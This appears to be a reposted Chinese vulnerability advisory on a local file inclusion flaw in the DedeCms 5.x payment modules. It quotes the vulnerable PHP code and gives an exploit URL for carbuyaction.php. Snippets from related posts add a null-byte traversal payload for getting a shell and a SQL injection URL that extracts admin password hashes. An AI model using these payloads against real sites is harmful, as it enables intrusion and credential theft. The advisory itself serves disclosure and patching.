DedeCms 5.x 本地文件包含漏洞(respond方法)

最新推荐文章于 2023-05-31 14:19:32 发布
最新推荐文章于 2023-05-31 14:19:32 发布
阅读量213 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/security4399/archive/2013/03/30/2990018.html
版权
漏洞版本:
DedeCms 5.x
漏洞描述:
DedeCms是免费的PHP网站内容管理系统。

plus/carbuyaction.php里没有对变量进行严格的过滤

出现漏洞的两个文件为:
Include/payment/alipay.php
Include/payment/yeepay.php
漏洞均出现在respond方法里

Include/payment/alipay.php
  1. ......
  2. function respond()
  3. {
  4. if(!empty($_POST))
  5. {
  6. foreach($_POST as $key => $data)
  7. {
  8. $_GET[$key]= $data;
  9. }
  10. }
  11. /* 引入配置文件 */
  12. require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
  13. ......
大概在133行左右,$_GET[‘code’]没有经过任何判断和过滤。 Include/payment/yeepay.php
  1. ......
  2. function respond()
  3. {
  5. /* 引入配置文件 */
  6. require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';
  8. $p1_MerId = trim($payment['yp_account']);
  9. $merchantKey = trim($payment['yp_key']);
  10. ......
大概在145行左右,$_REQUEST['code']没有经过任何判断和过滤。
<* 参考
http://bugscan.net/manage/node/83 
http://www.cnseay.com/2515/
*>
测试方法:
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
  1. http://www.php0day.com/plus/carbuyaction.php?dopost=return&code=http://www.cnblogs.com/tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断,使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie
  2.  
  3. 由于bankcod这两个文件并没有respond方法,所以如果code等于bank或者cod时将会暴错泄露路径
Sebug安全建议:
厂商补丁:

dedecms
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dedecms.com/products/dedecms/

转载于:https://www.cnblogs.com/security4399/archive/2013/03/30/2990018.html

weixin_30412167
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网站安全检测、漏洞检测、dedecms本地文件包含
z . s . j
05-06 2635
可以在“站长工具”或“360网站安全检测”进行网站安全检测 以下是个人遇到的网站安全检测问题: 这是修改后的检测返回的信息 之前是存在高危漏洞1个页面 【高危】dedecms本地文件包含 找到Include/payment/alipay.php        Include/payment/yeepay.php 从下载补丁的地址下载,按照你安装
java代码审计文件包含_代码审计:dedecms本地文件包含及物理路径泄露0day[转]
weixin_35132022的博客
03-02 166
晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯)出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里,估计这两个文件是临时工写的。Incl...
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
weixin_34090643的博客
03-21 1112
漏洞版本: DedeCmsV5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。 1 &lt;?php 02 require_once (dirname(__FILE__) . "/../include/comm...
DedeCMS漏洞文件之carbuyaction.php
xvrywgb的专栏
01-13 2480
DedeCMS漏洞文件之carbuyaction.php dedecms教程 DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell 详细说明:漏洞文件carbuyaction.php 本地试了一下,最新DedeCMS版本一样可行。 首先利用cookie修
Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复
zxy840552216的博客
09-15 482
使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下:漏洞文件carbuyaction.php 首先利用cookie修改工具,加上code=alipay然后访问 http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 直接包含成功 利用条件为GPCOFF,或者某些环境下的...
页面里包含空白 dede include 方式包含文件
Lucky_pyl的专栏
09-04 536
今天浏览之前做的页面发现在ie7模式下浏览会出现一点空白,查看html代码也没有发现有什么异常,但是ie的开发者工具里面却看到这样子的效果 显示  "文本 -"   后来查了许久在一个网站上提到bom的问题,特备注一下   bom介绍http://www.oschina.net/code/snippet_162279_10073
HTTP Response Status Code -- HTTP响应代码中文详解
热门推荐
.Net程序员
03-25 3万+
1xx - 信息提示这些状态代码表示临时的响应。客户端在收到常规响应之前,应准备接收一个或多个 1xx 响应。 · 100 - Continue 初始的请求已经接受,客户应当继续发送请求的其余部分。(HTTP 1.1新) · 101 - Switching Protocols 服务器将遵从客户的请求转换到另外一种协议(HTTP 1.1新) 2xx - 成功这类状态代码表明服务器成功
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 421
2019独角兽企业重金招聘Python工程师标准>>> ...
DedeCMS 漏洞集合
收集盒 Book box
01-03 1406
DedeCMS会员中心分类管理SQL注射 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 http://www.1990day.com/member/mtypes.php?dopost=save exploit: mtypename[7
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
最新发布
做自己喜欢的事,并将其发挥到极致!
05-31 3582
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 5990
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dedecmscan漏洞扫描
晚风不及你
03-16 1405
介绍 推荐一款,大佬编写,实用工具,只做推荐,请勿违法,如有侵权,请联系我删除。 dedescan是一款可以扫描所有已公开的dedecms漏洞的扫描器。 github地址 https://github.com/lengjibo/dedecmscan 安装依赖 • requests • re • termcolor • threading • itertools 使用方法 python3 dedescan.py 提示输入域名 参考链接 https://github.com/lengjibo/dedecmsc
百度杯 二月场web-include By Assassin [文件包含漏洞]
Assassin
03-17 1358
打开题目链接可以看到这就是典型的文件包含漏洞(当然题目中也是告诉你了,就是文件包含漏洞),之前不是很了解文件包含漏洞是什么,在这里实现了一下。大概找了一下,有位大哥小小总结了一下技巧1.基本的文件包含漏洞: code : * 包含同路径下的文件: ?file=.htaccess * 路径遍历: ?file=../../../../../../../../../var/lib/locate.db (
dedecms 漏洞汇总
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
文件包含漏洞之——本地文件包含漏洞 (LFI)
wsnbbz的博客
03-04 2547
定义 能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞 源代码 原理 为了方便,include等函数里放的不是一个指定文件,而是一个接收文件的变量,从而造成用户可以控制参数file改变这个变量 当参数file 的值为一个指定路径的文件时,此时变量就是此路径,include函数就会执行此文件,当文件不是可执行的php文件时,就会将文件内容读取出货来,这样用户就可通过更改url里的参数进行读取...
CVE-2018-20129-——DedeCMS V5.7 SP2前台文件上传漏洞
锋刃科技的博客
12-20 5628
0x01 漏洞概述 Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上传漏洞,远程攻击者可利用该漏洞上传并执行任意PH...
dedecms的文件上传漏洞利用方法和防范措施
05-16
DedeCMS是一款基于PHP的开源CMS系统,其文件上传漏洞是指攻击者利用程序中的文件上传功能,上传恶意文件并执行,从而造成系统被攻击的风险。下面是文件上传漏洞的利用方法和防范...5. 定期更新DedeCMS,及时修复漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值